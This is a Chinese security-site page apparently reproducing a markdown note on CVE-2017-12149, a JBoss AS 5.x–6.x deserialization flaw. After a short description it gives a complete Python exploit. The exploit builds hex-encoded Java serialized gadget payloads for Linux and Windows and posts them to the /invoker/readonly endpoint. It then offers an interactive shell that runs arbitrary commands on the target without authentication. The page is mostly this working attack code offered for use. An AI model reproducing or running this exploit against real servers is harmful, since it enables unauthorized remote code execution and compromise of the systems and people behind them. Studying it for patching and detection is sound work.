menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 反序列化漏洞 chevron_right (CVE-2017-12149)JBosS AS 6.X 反序列化漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2017-12149)JBosS AS 6.X 反序列化漏洞.md
    10.82 KB / 2021-04-21 09:23:46
        (CVE-2017-12149)JBosS AS 6.X 反序列化漏洞
    ===========================================
    
    一、漏洞简介
    ------------
    
    JBOSSApplication
    Server反序列化命令执行漏洞(CVE-2017-12149),远程攻击者利用漏洞可在未经任何身份验证的服务器主机上执行任意代码。漏洞危害程度为高危(High)。
    
    二、漏洞影响
    ------------
    
    JBoss 5.x - 6.x
    
    三、复现过程
    ------------
    
    ### poc
    
        cve-2017-12149_cmd.py
        #!/usr/bin/python
        #-*- coding:utf-8 -*-
    
        import requests
        import binascii
        import sys
        import re
    
        if len(sys.argv)!=2:
            print('+---------------------------------------------------------------+')
            print('+ DES: by zhzyker as https://github.com/zhzyker/exphub          +')
            print('+      as https://github.com/1337g/CVE-2017-10271               +')
            print('+---------------------------------------------------------------+')
            print('+ USE: python <filename> <url>                                  +')
            print('+ EXP: python cve-2017-12149_cmd.py http://freeerror.org:8080   +')
            print('+ VER: Jboss AS 5.X                                             +')
            print('+      Jboss AS 6.X                                             +')
            print('+---------------------------------------------------------------+')
            sys.exit()
        url_in = sys.argv[1]
    
        linux_payload_1 =  "aced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b734030000"                  "7870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f"                  "6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e747279"                  "8aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563"                  "743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372"                  "002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d6170"                  "2e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f7267"                  "2f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f72"                  "6d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374"                  "696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec"                  "287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f61706163"                  "68652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78"                  "707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e"                  "732e5472616e73666f726d65723bbd562af1d83418990200007870000000067372003b6f"                  "72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f"                  "72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c0009"                  "69436f6e7374616e7471007e00037870767200176a6176612e6e65742e55524c436c6173"                  "734c6f61646572000000000000000000000078707372003a6f72672e6170616368652e63"                  "6f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b657254"                  "72616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a61"                  "76612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176"                  "612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176"                  "612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563"                  "743b90ce589f1073296c020000787000000001757200125b4c6a6176612e6c616e672e43"                  "6c6173733bab16d7aecbcd5a990200007870000000017672000f5b4c6a6176612e6e6574"                  "2e55524c3b5251fd24c51b68cd020000787074000e676574436f6e7374727563746f7275"                  "71007e001a000000017671007e001a7371007e00137571007e0018000000017571007e00"                  "18000000017571007e001c000000017372000c6a6176612e6e65742e55524c962537361a"                  "fce47203000749000868617368436f6465490004706f72744c0009617574686f72697479"                  "71007e00154c000466696c6571007e00154c0004686f737471007e00154c000870726f74"                  "6f636f6c71007e00154c000372656671007e00157870ffffffffffffffff707400052f74"                  "6d702f74000074000466696c65707874000b6e6577496e7374616e63657571007e001a00"                  "0000017671007e00187371007e00137571007e00180000000174000e52756e436865636b"                  "436f6e6669677400096c6f6164436c6173737571007e001a00000001767200106a617661"                  "2e6c616e672e537472696e67a0f0a4387a3bb34202000078707371007e00137571007e00"                  "18000000017571007e001a0000000171007e003371007e001e7571007e001a0000000171"                  "007e00207371007e00137571007e001800000001757200135b4c6a6176612e6c616e672e"                  "537472696e673badd256e7e91d7b470200007870000000017400"
        win_payload_1 =  "aced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b734030000"                  "7870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f"                  "6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e747279"                  "8aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563"                  "743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372"                  "002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d6170"                  "2e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f7267"                  "2f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f72"                  "6d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374"                  "696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec"                  "287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f61706163"                  "68652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78"                  "707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e"                  "732e5472616e73666f726d65723bbd562af1d83418990200007870000000067372003b6f"                  "72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f"                  "72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c0009"                  "69436f6e7374616e7471007e00037870767200176a6176612e6e65742e55524c436c6173"                  "734c6f61646572000000000000000000000078707372003a6f72672e6170616368652e63"                  "6f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b657254"                  "72616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a61"                  "76612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176"                  "612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176"                  "612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563"                  "743b90ce589f1073296c020000787000000001757200125b4c6a6176612e6c616e672e43"                  "6c6173733bab16d7aecbcd5a990200007870000000017672000f5b4c6a6176612e6e6574"                  "2e55524c3b5251fd24c51b68cd020000787074000e676574436f6e7374727563746f7275"                  "71007e001a000000017671007e001a7371007e00137571007e0018000000017571007e00"                  "18000000017571007e001c000000017372000c6a6176612e6e65742e55524c962537361a"                  "fce47203000749000868617368436f6465490004706f72744c0009617574686f72697479"                  "71007e00154c000466696c6571007e00154c0004686f737471007e00154c000870726f74"                  "6f636f6c71007e00154c000372656671007e00157870ffffffffffffffff707400112f63"                  "3a2f77696e646f77732f74656d702f74000074000466696c65707874000b6e6577496e73"                  "74616e63657571007e001a000000017671007e00187371007e00137571007e0018000000"                  "0174000e52756e436865636b436f6e6669677400096c6f6164436c6173737571007e001a"                  "00000001767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078"                  "707371007e00137571007e0018000000017571007e001a0000000171007e003371007e00"                  "1e7571007e001a0000000171007e00207371007e00137571007e00180000000175720013"                  "5b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b47020000787000000001"                  "7400"
        payload_2 =  "71007e002a7571007e001a0000000171007e002c737200116a6176612e7574696c2e48617"                  "3684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573"                  "686f6c6478703f4000000000000077080000001000000000787878"
    
        payload_other = ""
    
        os_type = "unknown"
    
        def build_command_hex(command):
            command_exec_hex = "".join("{:02x}".format(ord(c)) for c in command)
            command_len = len(command)
            command_len_hex = '{:02x}'.format(command_len)
            command_hex = command_len_hex + command_exec_hex
            return command_hex
    
        def build_payload(target_os, command):
            global os_type
            if os_type == "unknown":
                if target_os == "linux":
                    payload = binascii.unhexlify(linux_payload_1 + build_command_hex(command) + payload_2)
                if target_os == "windows":
                    payload = binascii.unhexlify(win_payload_1 + build_command_hex(command) + payload_2)
            if os_type == "linux":
                payload = binascii.unhexlify(linux_payload_1 + build_command_hex(command) + payload_2)
            if os_type == "windows":
                payload = binascii.unhexlify(win_payload_1 + build_command_hex(command) + payload_2)
            return payload
    
        def do_post(payload):
            payload_url = url_in + "/invoker/readonly"
            result = requests.post(payload_url, payload, verify=False)
            result_content = str(result.content)
            return result_content
    
        def check_OS():
            global os_type
            payload_linux = build_payload('linux','whoami')
            payload_win = build_payload('windows','whoami')
            linux_re = do_post(payload_linux)
            win_re = do_post(payload_win)
            if  "[L291919]" in linux_re:
                os_type = 'linux'
            if "[W291013]" in win_re:
                os_type = 'windows'
            return os_type
    
    
        def run_command(command_in):
            payload = build_payload(os_type,command_in)
            result = do_post(payload)
            result = re.findall ( '](.*?)RunCheckConfig',result, re.DOTALL)
            if len(result) == 0:
                result.append("command error!\n")
            command_callback = result[0]
            return command_callback
    
        check_OS()
        if os_type =="unknown":
            print "[*] Unknown System"
            exit(0)
    
        print "***************************************************** \n"            "*             Target system is  " + os_type + " OS            * \n"            "***************************************************** \n"
    
        while 1:
            command_in = raw_input("Shell >>> ")
            if command_in == "exit" : exit(0)
            print run_command(command_in).decode('utf-8')
    
    
    links
    file_download